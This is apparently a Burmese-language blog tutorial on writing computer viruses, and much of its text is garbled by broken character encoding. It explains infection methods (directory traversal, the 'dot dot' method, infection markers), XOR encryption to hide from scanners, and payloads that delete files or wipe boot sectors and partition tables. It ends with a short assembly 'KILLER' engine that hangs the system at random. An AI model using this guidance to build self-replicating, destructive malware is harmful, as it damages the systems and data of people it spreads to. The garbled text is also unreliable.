Virus ကာ%�စပါကာU��႔�တြ�ကာ ကာ%�စပါကာTပသြနတးျsယဆ� Oအေသ� ဖ��ငတငး.,စပါ��ရာေ��အေ:ဖရာေ�တြ�ငး ထ�အေရာေ�ကာ�; (သ��႔) Viruses ကာ%�စပါကာ*��ငး�; ��ကာ9 �ဖ��႔�တြ�ကာ target အေပ� ခငး�။ကာ%�စပါကာTနတးျU��ငတငး.,စပါ��ကာ�� ရာေ��အေ:ဖဖ��႔ အေ��ကာ"# နည�လမ�မ��ကာ�� သ6�� ပA*��ငး"#�ယဆ။- Directory Traversal- "dot dot" method

Directory Traversal Method

ကာ%�စပါကာTနတးျU��ငတငး.,စပါ��ကာ�� ရာေ��အေ:ဖဖ��႔ directory traversal function �စပါ��အေရာေ�သ�� ခငး�၊ �ကာယဆ. ကာယဆ��အေ�� Directory Traversal functions အေတြ�ဟာ� recursive ဖစပါ"#�ယဆ။ ဒ#အေၾကာ�ငး�အေ*��အေ

တြကာ�ပ#�ယဆ။

အေ��ကာ� ဥးပမ�အေကာ�� Directory Traversal Functions �တြ�ကာ"#။

"dot dot" Method

"dot dot" method ဟာ�လည� ကာ%�စပါကာU��႔ ဖ��ငးT��အေ:ဖ ခငး� �တြ�ကာ �သ6�� ပA*��ငး"#�ယဆ။ "dot dot" method virus မ�� directory �စပါ��စပါ��တြ�ကာ ရာေ��အေ:ဖပ#�ယဆ။ �ကာယဆ၍ viurs ကာ%�စပါကာU��႔ မလ�ပအေလ�

ကာj O� ဆ��ရာေငး ယဆခငး directory ( dot dot ) ကာ�� ပပသြနတးျD�� ပ�� အေန�ကာ. ၾကာ�မ ကာ%�စပါကာU��႔�တြ�ကာ Fကာ�A�စပါ��ပ#�ယဆ။ ပထမဆ6�� အေ ပ�ငး�လ�ဖ��႔တြလယဆ� O��႔ memory chunk �စပါ��ကာ�� set up လ�ငတပ.ယဆ။ FINDFIRST န�႔ FINDNEXT calls အေတြ�ရာေ�႕ series �စပါ��ကာ�� ထ��အေပ��ယဆ။

http://s289.photobucket.com/albums/ll228/starryprincexxi/?action=view&current=directorytravaselmethod11.jpg

အေ��ကာ� code အေတြ�အေကာ�� dot dot method �တြ�ကာ ဖစပါ"#�ယဆ။

Virus က��စချက��ခားငး�� : အဆငး"�� (၂)

Virueses က��စချက��ခားငး��ဆ�ငး8� စချ'က�စချစချ�ေ�ဆ��ခားငး��

http://s289.photobucket.com/albums/ll228/starryprincexxi/?action=view&current=dotdotmethod11.jpg

ဖ��ငး န�႔ program �စပါ��ခ�ကာ�� virues ကာ%�စပါကာ8 ငး�+8လ�� မသငး�+j,O�လ�� ဆ�� စပါစပါအေဆ� ခငး�ပ#။စပါ6ခ��နတးျN6ညyန �ကာ�� စပါစပါအေဆ�ဖ��႔�တြ�ကာ ဥးပမ�အေပ�ထ��႔ code အေတြ�ပ# ....

�ထကာ"# code န�႔ ဖ��ငတငး.,စပါ��ရာေ�႕ file name ကာ�� စပါစပါအေဆ�ရာေ�မ�� ကာယဆ၍ file name မ�� အေန�ကာ( 6�� စပါ�လ6��အေတြ�ဟာ� ND န�႔ �%ည�အေနမယဆ( ��ရာေငး စပါစပါအေဆ� ခငး�ဟာ� fail ဖစပါ"#လ�မ��ယဆ။

Virus က��စချက��ခားငး�� : အဆငး"�� (၃)

ယသခားငး:; �စချက��ခားငး��မား��အတြတက� စချစချ�ေ�ဆ��ခားငး��ဖ��ငတငး.,စပါ��ခ�ကာ�� virus ကာ%�စပါကာ ပ�� ပ�လ��၊ မ ပ��အေသ�ဘး%�လ�� ဆ�� စပါစပါအေဆ�ပ#�ယဆ။ဒ�ဟာ�ကာ ဖ��ငတငး.,စပါ��ည�ကာ�� virus အေတြ� �စပါ8��စပါ.န �ၾကာ�� ကာ%�စပါကာအေနတးျKခငး�မ�� အေရာေ��ငးT��ဖ��႔�တြ�ကာ �သ6��၀ငး"#�ယဆ။

အေ��ကာ�� ပထ��႔ code အေတြ�အေကာ�� ရငတငး��ည�ကာ virus ကာ%�စပါကာ ပ�� ပ�လ��ဆ��ကာ�� စပါစပါအေဆ��႔ ဥးပမ� code အေတြ�ပ#။

Virus က��စချက��ခားငး��အတြတက� ဖ��ငး*စခစချ��က� မား&တ� ��ခားငး��ကာ%�စပါကာU��ငတငး.,စပါ��ကာ�� မ��8 �� ခငး�ဟာ� ကာ%�စပါကာU��ငးအေတြ�ကာ�� သ��မ�� ပAဖ��႔�တြ�ကာ �သ6��၀ငး"#�ယဆ။၄ငး�ဟာ� ကာ%�စပါကာ ပ��သ��ဖ��ငးအေတြ�ကာ�� အေရာေ��ငးT��*��ငးU��႔�တြ�ကာ9 ည� �ကာ%�ည�အေပ�ပ#�ယဆ။ဖ��ငတငးX� ယဆခငး�ငတO�စပါကာ ပ��သ��ဖ��ငတငး.,စပါ��ခ�ကာ�� စပါစပါအေဆ�ဖ��႔�တြ�ကာ marker ကာ�� ရာေ��အေအေ:ဖပ�ပ#�ယဆ။

အေ��ကာ�� ပထ��႔ ဥးပမ�code အေတြ�အေကာ�� ကာ%�စပါကာU��ငတငး.,စပါ��မ�� marker ကာ�� အေ�ထ�ကာE ကာ%အေပ�*��ငးU��႔�တြ�ကာ8 6�� ပAပ#�ယဆ။

http://3.bp.blogspot.com/_-SA0bLCWpIA/Swp0k5FDD2I/AAAAAAAAADU/vxGsNmdlP94/s1600/check+example+code11.JPG

http://s289.photobucket.com/albums/ll228/starryprincexxi/?action=view&current=checkperviousinfection11.jpg

ဒ��ပ��ငး�အေကာ�� Virus ဖနတးျ.�� ခငး� posts န�႔ပ�8 � ပ�� အေန�ကာ( 6��ပ��ငး�ပ#။ အေသခ��အေလ�လ�ၾကာည��ယဆ( ��ရာေငး Virus �စပါ��ကာ�� ဖနတးျ.��ဖ��႔�တြ�ကာ �စပါ��E ပ��ငး� ၂၅ ပ��ငး� ပ#၀ငး.,ယဆ(��ကာ�� အေတြ�႔ရာေပ#လ�မ��ယဆ။ ပ��အေ�� Virus ကာ%�စပါကာ ခငး��ဆငး� ၅ ဆငး�T��႔�ထ�မ�� ဆငး� ( ၁ ) ၊ ( ၂ ) ၊ ( ၃ ) ကာ�� အေဖ� ပခ�႔ ပ��ပ# ပ�။ ဒ� post မ��အေ�� ဆငး� (၄) န�႔ (၅) � ပငး Virus ဖနတးျ.�� ခငး��တြ�ကာ သ�ထ��ရာေမယဆ� Virus ရာေ�႕�ဓ�ကာ �စပါ��E ပ��ငး� (၃) ပ��ငး�ကာ�� အေဖ� ပထ��ပ#�ယဆ။ ဒ��ပ��ငး�ကာ န�န�ရာေ;ပအေတြထ�ပ#�ယဆ။ ၾကာ�A�စပါ�� ပ�� ဖ�Tပ#လ�မ��ယဆ။

Virus ကာ%�စပါကာ ခငး� : �ဆငး� (၄)

Virus ကာ%�စပါကာU��ငး

ဖ��ငး attributes မ��ကာ�� သ�မ�ဆည� ခငး�

- virus ကာ%�စပါကာU��႔�တြ�ကာ ဖ��ငတငး.,စပါ��ကာ�� ရာေ��အေ:ဖ ပ��႔ အေန�ကာ�� ဒ�ဖ��ငးT�႕ attributes ၊ �ခ��န ၊ အေန႔ရာေကာ န�႔ ဖ��ငတငး(�ငတ�ဒ အေတြ�ကာ�� ဖ�8 ��ထ��လ��ကာ"#�ယဆ။- ��ဒ� attributes အေတြ�ကာ�� variable memory space မ�� သ�မ�ဆည�ထ�� ပ�� ပနတးျ9ငတ�[��အေ၀သ��အေပ�ပ#�ယဆ။-အေ��ကာ�� ပထ��႔ code အေတြ�အေကာ�� ဒ� attributes ��လ6��ကာ�� သ�မ�ဆည�အေပ�ဖ��႔�တြ�ကာ �သ6�� ပAပ#�ယဆ။

Virus ကာ%�စပါကာ ခငး� : �ဆငး� ( ၄) ( ဆကာ9 ကာ၍)

ဖ��ငး attributes မ��ကာ�� လ��ပ8လ�� ပငး(ငးအေ ပ�ငး�လ� ခငး�

- ဒ��ပ��ငး�အေကာ�� system ရာေ�႕ virus ကာ%�စပါကာ ခငး�၊ ဖ6��တြကာယဆ ခငး� န�႔ read only ဖ��ငး မ�� ဖစပါ9�ဖ��႔�တြ�ကာ ကာ%ည�အေပ�

http://s289.photobucket.com/albums/ll228/starryprincexxi/?action=view&current=helpmarker11.jpg

http://s289.photobucket.com/albums/ll228/starryprincexxi/?action=view&current=step4111.jpg

ပ#�ယဆ။- အေ��ကာ�� ဥးပမ� ပထ��႔ code အေတြ�အေကာ�� ခ�အေ ပ�ခ�႔��႔ဟာ�အေတြ�ကာ�� လ�ပအေဆ�ငးအေပ�ဖ��႔�တြ�ကာ �သ6�� ပAပ#�ယဆ။

read/write mode မ�� ဖ��ငတငး��ငတ�:ဖငး� ခငး�

- handler �စပါ��န�႔ ဖ��ငတငး��ငတ� :ဖငး�U��႔�တြ�ကာ �သ6�� ပA*��ငး"#�ယဆ။- ဖ��ငတငး.,စပါ��ကာ�� :ဖငး�*��ငတငး.�႔ ဥးပမ� code အေတြ�ပ#။

Virus ကာ%�စပါကာ ခငး� : �ဆငး� (၄) ( ဆကာ9 ကာ၍)

Virus ရာေ�႕ လ�ပdန �မ��ကာ�� Run ခငး�

- ဒ��ဆငး��အေ�� Virus ဟာ� သ%ရာေ�႕ main action ကာ�� အေဆ�ပသြငးTကာ"#�ယဆ။- �စပါ��E ပ��ငး� �မ��A�မ�� A� န�႔ သ%��႔ရာေ�႕ actions အေတြ�ကာ�� အေန�ကာ"��ငး�မ�� အေဖ� အေပပ�တြသ��ပ#မယဆ။

Virus ကာ%�စပါကာ ခငး� : �ဆငး� (၅)

လမ�အေၾကာ�ငး�မ��ကာ�� ကာ�တြကာယဆ ခငး�

- ဖ��ငး attribute အေတြ� ၊ �ခ��န န�႔ အေန႔ရာေကာအေတြ�ကာ�� အေ ပ�ငး�လ�တြသ��မ�န မသ�အေ��ငး Restore ဖစပါ9,�ပ"#�ယဆ။- အေ��ကာ"# code အေတြ�အေကာ�� ဖ��ငး attribute အေတြ�ကာ�� restore လ�ပU��႔�တြ�ကာ �သ6�� ပAပ#�ယဆ။

http://s289.photobucket.com/albums/ll228/starryprincexxi/?action=view&current=step4cond111.jpg

http://s289.photobucket.com/albums/ll228/starryprincexxi/?action=view&current=step4cond222.jpg

Virus မ��၏ �စပါ��E ပ��ငး�မ��

Virusအေတြ�မ�� အေ��ကာ"#��ငး� �ပ��ငး� ( ၃ ) ပ��ငး� ပ#၀ငး ပ#�ယဆ။ ��ဒ#အေတြ�အေကာ��...(၁) Replicator ( Copier)

Replicator ဆ��အေကာ�� Virus အေရာေ�ကာT��တြသ��႔ system �စပါ��လ6��မ�� Virus ပန ႔*�6႕ တြသ��ဖ��႔ အေဆ�ပသြငးTကာT��႔ �ပ��ငး�ပ#။(၂) Conceler (ဖ6��တြကာယဆ ခငး�)Conceler အေကာ�� အေန႔စပါဥးEသ6�� ပAအေန��႔ user အေတြ�၊ Virus scanner အေတြ�ကာ Virus program ကာ�� အေတြ�႔မတြသ��အေ��ငး ကာ�တြကာယဆc ��အေပ�ပ#�ယဆ။(၃) Bomb/Payload

Virus ရာေ�႕ ဒ��ပ��ငး�အေကာ�� deletion ��လ6�� ၊ slowdown ��လ6�� စပါသ ဖငး� Virus ရာေ�႕ ဖ�ကာ( �� ခငး��ပ��ငး�အေတြ�ကာ�� လ�ပအေဆ�ငး"#�ယဆ။

Replicator �ပ��ငး� ရာေ�႕ Function မ��

Replicator ဟာ� အေ��ကာ� �ဆငး� *�စပါ�� ငး� �လ�+ပ9,�ပ"#�ယဆ... ၄ငး�ဟာ� ကာ%�စပါကာ�6ရာေ��႔ ဖ��ငးT�႕ ပထမဆ6�� bytes �နည�ငးယဆ� �� ရငတငး(6�� saves လ��ကာ"#�ယဆ။ ��ဒ�အေန�ကာ��အေ�� Virus code �ပ��ငး�အေလ��စပါ��ကာ�� ဖ��ငး ရာေ�႕ �စပါ န�႔ �ဆ6�� ပ��ငး�မ�� copy ကာ%�ထည�အေပ�လ��ကာ"#

�ယဆ။

အေ��ကာ�� ပထ��႔ Diagram ကာ�� ၾကာည�=9�,�ကာTငး ရာေ�ငး�တြသ��ပ#လ�မ��ယဆ။

Diagrammatical representation

http://s289.photobucket.com/albums/ll228/starryprincexxi/?action=view&current=step5111.jpg

Replicator ရာေ�႕ Writing ပ��ငး�

�ဆငး� (၁) : program ရာေ�႕ V2 သ��႔ V1 transfers control

Replicator ရာေ�႕ Writing ပ��ငး� (ဆကာ9 ကာ၍)

�ဆငး� (၂) :

V2 မ�� main virus code ကာ��ထည�"#�ယဆ။ V2 ရာေ�႕ အေန�ကာ( 6��ပ��ငး�မ�� V1 ရာေ�႕ အေနရာေ�အေကာနတြထကာ9 ��႔ P1 ကာ�� copy လ�ပ"#�ယဆ။ ဖ��ငး ရာေ�႕ �စပါပ��ငး�ကာ�� Transfers control လ�ပ"#�ယဆ။

http://s289.photobucket.com/albums/ll228/starryprincexxi/?action=view&current=diaggram111.jpg

http://s289.photobucket.com/albums/ll228/starryprincexxi/?action=view&current=v1step1111.jpg

�ထကာ"# �လ�ပအေတြ�ကာ�� ပAလ�ပအေဆ�ပသြငးTကာအေပ�မယဆ� Sample Code အေတြ� ဖစပါ"#�ယဆ :

Concealer ရာေ�႕ Writing ပ��ငး�

Concelar ကာ user အေတြ� န�႔ Virus scanner အေတြ� အေမတြ�အေ႔��ငး Virus codes ကာ�� ဖ6��တြကာယဆ9 ��ကာ"#�ယဆ။ Virusအေတြ�ကာ�� ဖ6��တြကာယဆအေပ�ဖ��႔�တြ�ကာ Encryption ဟာ� �တြ�+ငး��,ယဆ(6��သ6��အေန��႔ method �စပါ��ပ#။

XOR encryption �စပါ�� တြ�ကာ ဥးပမ� code အေတြ� ဖစပါ"#�ယဆ...

Dispatcher

Dispatcher ဆ��အေကာ�� Virus ကာ%�စပါကာ. �႔ program ဆ�ကာ�� control ပနတးျ9ငတ�ပ*��ငးU��႔�တြ�ကာ restore လ�ပအေပ��႔ Virus

ရာေ�႕ �စပါ��E ပ��ငး��စပါ�� ဖစပါ"#�ယဆ။COM virus �စပါ��တြ�ကာ Dispatcher ပ#...

http://s289.photobucket.com/albums/ll228/starryprincexxi/?action=view&current=replicator111.jpg

http://s289.photobucket.com/albums/ll228/starryprincexxi/?action=view&current=encryption111.jpg

Bomb/Payload ရာေ�႕ Writing ပ��ငး�

ဒ��ပ��ငး�အေကာ�� virus �စပါ��ရာေ�႕ �ဓ�ကာ �ခန �ကာ႑ျ ဖစပါ"#�ယဆ။Bomb �ပ��ငး�မ�� အေ��ကာ�� ပထ��႔ problem အေတြ�ကာ�� ဖနတးျ.��ဖ��႔�တြ�ကာ အေရာေ�သ��*��ငး"#�ယဆ :

System slowdown File deletion

အေမကာ�ငး�အေသ�/ရ��ငး�စပါ��ငး�အေသ� message မ�� အေဖ� အေပစပါ ခငး� hard drive ရာေ�႕ Partion Table/Boot Sector/FAT မ��ကာ�� ဖ�ကာ( ��ပစပါ ခငး�/�စပါ��ထ�� ခငး�(သ��႔)�သစပါ9�ကပလ�ယဆ ခ

ငး�

Virus ရာေ�႕ Payload �ပ��ငး�မ�� ပ#၀ငး.�အေတြ�အေကာ�� :

Trigger mechanism (�စပါပ��A�အေပ�အေသ� စပါနကာ"��ငး�) Destructive code (ပ�ကာN��အေအေစပါသ� code )

Trigger Mechanism

Trigger Mechanism ဟာ� Virus �စပါ�� activation ဖစပါU��႔�တြ�ကာ logical condition ကာ�� ဖနတးျ.��အေပ�ပ#�ယဆ။Trigger အေတြ�ရာေ�႕ type အေတြ�အေကာ�� အေ��ကာ"#��ငး� ဖစပါ*��ငး"#�ယဆ :

Counter trigger Keystoke trigger Time trigger Replication trigger System parameter trigger Null trigger

Bombs/ Payloads

Payloads ရာေ�႕ logics မ�� အေ��ကာ"# action အေတြ��ငး� အေဆ�ပသြငးTကာအေ��ငး code အေရာေ�သ��*��ငး"#�ယဆ :

Brute force attacks Hardware failure Stealth attack Indirect attack

http://s289.photobucket.com/albums/ll228/starryprincexxi/?action=view&current=dispacher111.jpg

Brute Force Logic Bombs

ဒ� bombs အေတြ�အေကာ�� system resources အေတြ�ကာ�� ပ�ကာ( ��အေစပါ ခငး� မရာေ��ပ#ဘး%�။ ဒ#အေပမယဆ� စပါ�အေ�E *��ငး�+E,ယဆ�ကာ ဖစပါအေ��ငးအေ�� ဖနတးျ.��*��+ငးFကာပ#�ယဆ။အေ��ကာ�� ဥးပမ� ပထ��႔ code အေတြ�အေကာ�� system speaker ကာ�� turn on လ�ပအေပ��႔ code အေတြ� ဖစပါ"#�ယဆ...

Virus Code မ��ကာ�� စပါမ�သပ ခငး�

back up လ�ငတပc��႔ Virus codes အေတြ�ကာ�� ယဆ%ပ#။ RamDrives မ��ကာ��သ6��ပ#။ anti-virus utilitie မ��ကာ��သ6��ပ#။

အေ�ကာ�ငး�:မ+နတးျ(6�� Virus အေရာေ�သ�� ခငး��တြ�ကာ �ၾကာ6အေပ�ခ�ကာ

heap memory ကာ��သ6��ပ#။ procedure call မ��ကာ��သ6�� ပAပ#။ အေကာ�ငး�:မ+နတးျ.�႔ assembler န�႔ debugger �စပါ��ကာ�� သ6��ပ#။ LEA �စပါ�� MOV ကာ�� သ6��မ ပAပ#န�႔။

��ခ�AအေပEနန�႔ အေ ပ�ရာေရာေငးအေ��...

တြကာန ပ{�� virus ဆ�� self-replicating computer program �စပါ�� ဖစပါ ပ��အေ�� ခ�� executable code (

သ��႔) documents မ��ထ�ကာ�� သ%႔ကာ��ယဆ8 O copy ကာ%�ထည� ခငး� �� ဖငး� ကာ%�စပါကာ ပန ႔*�6အေ႕စပါပ#�ယဆ။ Virus အေရာေ�သ�� ခငး��တြ�ကာ အေ� ခခ6ကာ��႔ လ��ပ��အေကာ� �� assembly language ကာ�� မခတြqငး�မခ�န သ�ထ��ရာေ

မ��ပ� ဖစပါ"#�ယဆ။ Utilitie အေတြ�အေ�နန�႔အေကာ�� turbo C compiler န�႔ Norton utilitie အေတြ�ကာ virus အေရာေ�သ�� ခငး� process

�တြ�ကာ တြလယဆ� Oအေခ��အေ:မအေ႔စပါပ#�ယဆ။ Virus မ�� replicator , concealer န�႔ payload ဆ�� ပ�� ပ��ငး� (၃) ပ��ငး�ပ#၀ငး"#�ယဆ။

http://s289.photobucket.com/albums/ll228/starryprincexxi/?action=view&current=dispacher111.jpg

န��လ[~ယဆ9 ��အေ႔�� ထငး"#�ယဆ။ ဒ#အေပမယဆ� beginner အေတြ��တြ�ကာအေ�� န�န�ခကာ"#�ယဆ။

ENGINES

Engines ဆ��အေကာ�� binary န�႔ source အေတြ�ကာ�� ကာ��ယဆN�� ပA��႔ တြလ�9 ငတပ.�႔ viurs အေရာေ�သ��နည� �စပါ�� ဖစပါ"#�ယဆ။

မား�တ> က�

Virus Engine အေတြ�ဟာ� C/C++ class ( object ) အေတြ�န�႔ �တြလနတးျ"ငတငး(ငတ,ငး.ငတOၾကာ ပ��၊ �%ည��႔ ဂ�ဏ8 �W�အေတြ�လည� �မ��ၾကာ��ရာေ��ၾကာပ#�ယဆ။ ဒ�ဟာ�*�စပါ��လ6��ဟာ� modularity ကာ�� ကာT��ကသြားျကာ8 ��ပ#�ယဆ။ �စပါ��ပ� တြကာ� ခ��မ;ရာေ��ပ#�ယဆ... ��ဒ#အေကာ�� Virus Engine ကာ ��ကာT��ကာ အေ�ကာ�ငးEထညအေဖ�*��ငး ပ�� C++ class အေကာ�� ၾကာ��ခ6အေပ#ငး�ကာ%�အေပ��႔စပါနကပစပါ� မ�� ပ��လ�ပ#�ယဆ။OOP (Object Oriented Programming ) ကာ�� မ��( ကာအေပ�ခ�႔ ပ��သ[\စပါလ��႔ အေယဆန႔ဆ��ရာေငး Virus Engines ဟာ� *�စပါအေပ#ငး�မ��:စပါ�ၾကာ�ခ�႔ ပ� ဖစပါ.�႔ Programs အေတြ�ကာ�႔သ��႔ �%ည��႔ �ဆငး�� အေရာေ�ကာT��လ�ပ# ပ�။ ပ��အေ�� ယဆခ��ခ��နတးျX� အေ ပ�ငး�လ�ဖ��႔�ခ��နတးျ9ငတည� ဖစပါအေနပ# ပ�။ဒ� post ရာေ�႕ လ��ရာေငး�အေကာ�� Virus Engine ရာေ�႕ �ဆငးအေ ပ ပ�� သ6��၀ငး.�႔ လကာၡဏ�ရာေပအေတြ�ကာ�� အေဖ� အေပပ�တြသ��မ�� ဖစပါ"#�ယဆ။Virus အေရာေ�သ�� ခငး�မ�� တြလ�9 ငတပ.�အေ႔ရာေ�သ��နည��စပါ��E ပ��ငး�(modules) မ��ကာ�� န��လည ပ��မ�သ�လ��ငး ဒ�ထ�မ��ပ#��႔ အေ�တြ��အေ�ခၚပ��ငး�ကာ�� န��လ[n��ငး�� ဖစပါ"#�ယဆ။ဒ# �� ပငး ဒ�post ထ�မ�� LDE32, KME's, ETG, CMIX, DSCRIPT, EXPO, RPME,

CODEGEN, PRCG, MACHO န�႔ MISTFALL ��႔ရာေ�႕ property ��လ6��န��ပ#�ကာ�� ဒ�post �စပါ��ည�န�႔ အေဖ� အေပပ� ပ��သ�� ဖပသြစပါD��မ�� ဖစပါ"#�ယဆ။ဒ#အေ��ငး�� အေ�ရာေ�ၾကာ��႔ စပါ6သ��;အေတြ� ��လ6��ကာ�� အေဖ� ပထ��မဟာ��"� စပါ6သ��U��႔�တြ�ကာ �နည�ငးယဆ� ��သ� အေဖ� ပဖ��႔ ၾကာ�A�စပါ��ထ�� ဖစပါ"#�ယဆ။ ဒ�အေနရာေ�မ�� စပါ6သ��;ဆ�� Engine ရာေ�႕ ၾကာ��ခ6အေပ#ငး�ကာ%�စပါနကပစပါEပ��d�မ�� လ6��၀န��ပ#� သကာအေရာေ�ကာ9 yမ�မ��မ;အေတြ�ကာ�� ဆ��လ�� ဖစပါ ပ�� ကာ�နတးျ.�႔�ပ��ငး�အေတြ�ကာ �မ�� ဖငး�အေ�� %ည�အေနမ�� ဖစပါ"#�ယဆ။ အေသခ��အေကာ�� လ�+ပ9�ငတပ.�ခ�ငး� �%ည�မ;ရာေ��မ��မဟာ��"#ဘး%�။

Code

Engine မ�� executable code အေတြ�သ�လ��ငး ပ#၀ငးTပ#မယဆ။ ဆ��လ��အေကာ�� evident formအေတြ�မ�� data အေတြ�မပ#၀ငးTပ#ဘး%�။ ၄ငး�ဟာ� code generation ထ�မ�� data ရာေ�႕ means �� ဖငး� :စပါမ�အေဆ�ငး*��ငးTပ#မယဆ။

Engine မ�� absolute offset မ�� မပ#၀ငးTပ#ဘး%�။ ၄ငး�ဟာ� stack န�႔ ဒ� structure သ��႔ pointer အေ ပ�ငး�အေရာေy႕

လ��ကာ. �႔ အေပၚမ�� data structure ဖနတးျ.�� ခငး�ရာေ�႕ means �� ဖငး� :စပါမ�အေဆ�ငး*��ငးTပ#မယဆ။

Engine မ�� external data structure မ�� ကာ�� ကာT��ကာE သ6��မ ပAရာေပ#ဘး%�။ external subroutine မ��ကာ�� ကာT��ကာ CALL မလ�ပTပ#ဘး%�။ ၄ငး��စပါ�� data န�႔ suboroutine မ��သ��႔ pointer မ��ကာ�� argument မ��ကာ��သ��႔ engine ဆ�ကာ�� ဖ�အေကာ��9�အေစပါရာေပ#မယဆ။

(အေပသြရာေ�ခ�ယဆ�;�စပါ��အေ�နန�႔)Engine ကာ�� system call မ�� မ ပAလ�ပအေစပါရာေပ#ဘး%�။ ��ဒ��စပါ�� own subroutine မ��သ��႔

pointer မ��ဟာ� engine ကာ�� ဖ�အေကာ��Tပ#မယဆ။ ပ��ရာေငး engine ကာ ၄ငး��႔ကာ�� ဖ�အေကာ�� ပ�� system

subroutine မ��ကာ�� CALL လ�ပTပ#မယဆ။

PUBLIC-functions

Parameter မ��ဟာ� stack အေပၚမ�� ဖ�အေကာ��အေစပါရာေပ#မယဆ။ ( register မ��ထ�မ�� မဟာ��"#။) Function result ဟာ�( လ��ပ9��ငး) EAX ထ�မ�� return ဖစပါTပ#မယဆ။ register မ��လ6��ကာ�� ထ�န �သ�မ�ထ��ရာေပ#မယဆ( EAX မ�တြလ�၍)။ (အေပသြရာေ�ခ�ယဆ�;�စပါ��အေ�နန�႔) function exit အေပၚမ�� DF flag ဟာ� 0 (သ6�ည) ဖစပါအေစပါရာေပ#မယဆ။ (CLD)

Sources

�ကာယဆ၍ Source မ�� ရာေ��ခ�႔ရာေငး Variables, arguments, constants, internal subroutines န�႔ � ခ�� name န�႔ lable မ��ဟာ� unique ဖစပါTပ#မယဆ။ user ရာေ�႕ source မ�� (သ��႔) � ခ�� engine မ��ထ�မ� label မ��န�႔ �ထပ.ငတည� မ ဖစပါအေစပါရာေပ#ဘး%�။

�ကာယဆ၍ �ခ��Aအေ႕သ� data structure မ�� န�႔/သ��႔ exit codes , engine call ထ�မ�� သ6�� ပA ခငး� ရာေ��ရာေငး ၄ငး��႔��လ6��ကာ�� သ�� ခ�� .INC file ထ�မ�� အေဖ� ပရာေပ#မယဆ။

Documentation

Engine ဟာ� documention �ခ��A႕ �� ဖငး� ခ��( ကာTပ#မယဆ။ အေ��ကာ�� ပထ��႔ဟာ�အေတြ�လ��ပ� အေဖ� ပသငး�"#�ယဆ...

Engine ၊ ၄ငး�ရာေ�႕ algorithm ၊ ၄ငး�ရာေ�႕ �ဓ�ကာရာေညရြ[mယဆ��ကာ ။ ဆ��လ��အေကာ�� ၄ငး�ဟာ� ဘး��တြ�ကာTညရြ[mယဆ ပ�� ဘးယဆ9 ��အေတြ� �လ�+ပ9�ငတပ8လ�၊

PUBLIC-function �သ��သ��ရာေ�႕ အေဖ� ပခ�ကာ န�႔ ၄ငး�ရာေ�႕ parameter မ��၊ (အေပသြရာေ�ခ�ယဆ�;�� ဖငး�) bug မ�� န�႔ �ဂ�#ရာေပ��၊ (အေပသြရာေ�ခ�ယဆ�;�� ဖငး�) engine ကာ�� ဘးယဆ��စပါမ�သပ ပ�� ပ�လ�၊ ၄ငး�ကာ ဘးယဆ��လ�+ပ9�+ပ9� ၊ မလ�ငတပjငတO�လ�။

ေအက�ငး��ဆ'�� နညျ��လမား��

Engine မ�� PUBLIC-function �စပါ��ည� ရာေ��ပ#�ယဆ။ engine ရာေ�႕ code �စပါပ��ငး�မ��( �လယဆ�� ဖစပါ��ငးTငး �စပါမ�� JMP ကာ��သ6��။) ဖစပါ ပ�� ၄ငး�ရာေ�႕ main function မ�� CDECL calling convection (PUSH*n, CALL, RETN, ADD

ESP, n*4 ) ရာေ��ပ#�ယဆ။ Engine ဟာ� on-stack data variable မ��ကာ��သ� �သ6�� ပAပ#�ယဆ။ (argument မ��န�႔ variables space)

Engine ဟာ� multithread enviroument ထ�မ�� လ�+ပ9,�ပ"#�ယဆ။ (ဆ��လ��အေကာ�� external data structure မ��သ��႔ pointer မ��ဟာ� engine ဆ�ကာ�� ဖ�အေကာ��9��႔�ခ# engine ရာေ�႕ ��:ပ��လ��႔ ဖစပါNဥးအေတြ�ဟာ� ��ဒ�� data

structure မ��န�႔ မ�နတးျ��+နတးျ�+ကပနတးျ�န �လ�+ပ9,�ပ"#လ�မ��ယဆ။)

Engine ဟာ� .386 realmode opcode မ��ကာ�� သ�လ��ငတငးEသ6�� ပAပ#�ယဆ။ (ဆ��လ��ကာ ��လ6��စပါ"န �သ��ယဆ (သ��႔) .486+ opcode မ�� ၊ bswap (သ��႔) cmpxchg ကာ�႔သ��႔ ပ လပ*��ငတငး.ယဆ။)

အက��@�ရလဒမား0��

�ထကာ��အေဖ� ပခ�႔��႔ �ဂ�#ရာေပ�� လ6��ကာ��သ6�� ပA ခငး�� ဖငး� engine code ဟာ� OS ၊ ring0/3 န�႔

engine �[m��ရာေ� offset မ� တြလ�အေ မ�ကာ9 �*��ငး"#လ�မ��ယဆ။ code ကာ�႔သ��႔ အေပ#ငး�စပါပ*��ငး"#လ�မ��ယဆ...ဆ��လ��အေကာ�� ဘး

ယဆ� y=နတးျFကာ��ခ�ကာ��ကာ��မဆ�� တြလယဆ. ကာ% စပါ�စပါစပါ*��ငး ခငး�၊ ဖယဆT��*��ငး ခငး� န�႔/သ��႔ �စပါ��ထ��လ�လ�ယဆS��ငး ခငး�မ�� ပAလ�ပ*��ငး"#

�ယဆ။ ဒ�လ��မ�� engine မ��ရာေ�႕ Code (သ��႔) source မ��ကာ�� ခ�� ဘးယဆengine မ��မ��မဆ�� (သ��႔) viruse မ��၊ virus

constructor မ�� (သ��႔) generator မ�� (သ��႔) virus plugin မ�� ထ�သ��အေ႔ ပ�ငး�ထည� ခငး�မ�� ဖငး� တြလယဆ� O:စပါ��

သ6�� ပA*��ငး"#�ယဆ။

ဒ# �� ပငး asm- ၊ cpp- code မ��န�႔ ခ��( ကာc ��႔ လ�ပdန ��၀နတးျ��ကာ��လည� .obj file မ�� သ6��မ ပAပ� အေ ဖရာေ�ငး�*��ငး"#�

ယဆ။

ဥပမား�

Engine : KILLER ။ ရညမE&န ��ခား�ကFန ��တ�ငး� : 1/1000 ရာေ�႕ ဖစပါ*��ငးအေ ခန�႔ ဟာန ႔��ထစပါအေအေနစပါဖ��႔ ။

----[begin KILLER.ASM]--------------------------------------------------; KILLER engine version 1.00 FREEWARE; action: hangup with probability of 1/1000;; CDECL calling convention;; 5 arguments;; no return value, no registers modifiedkiller_engine proc c

arg user_param ; user-data arg user_random ; external randomer arg arg1 arg arg2 ; other parameters arg arg3 pusha cld ;; push 1000 push user_param ; maybe ptr to some struct call user_random ; call external subroutine add esp, 8 ;; cmp eax, 666 je $ ;; popa ret ; TASM produces LEAVE+RETN endp----[end KILLER.ASM]----------------------------------------------------

ASM include file ��ဖစချ�ေ�ပေGစချပHတယသ�...:

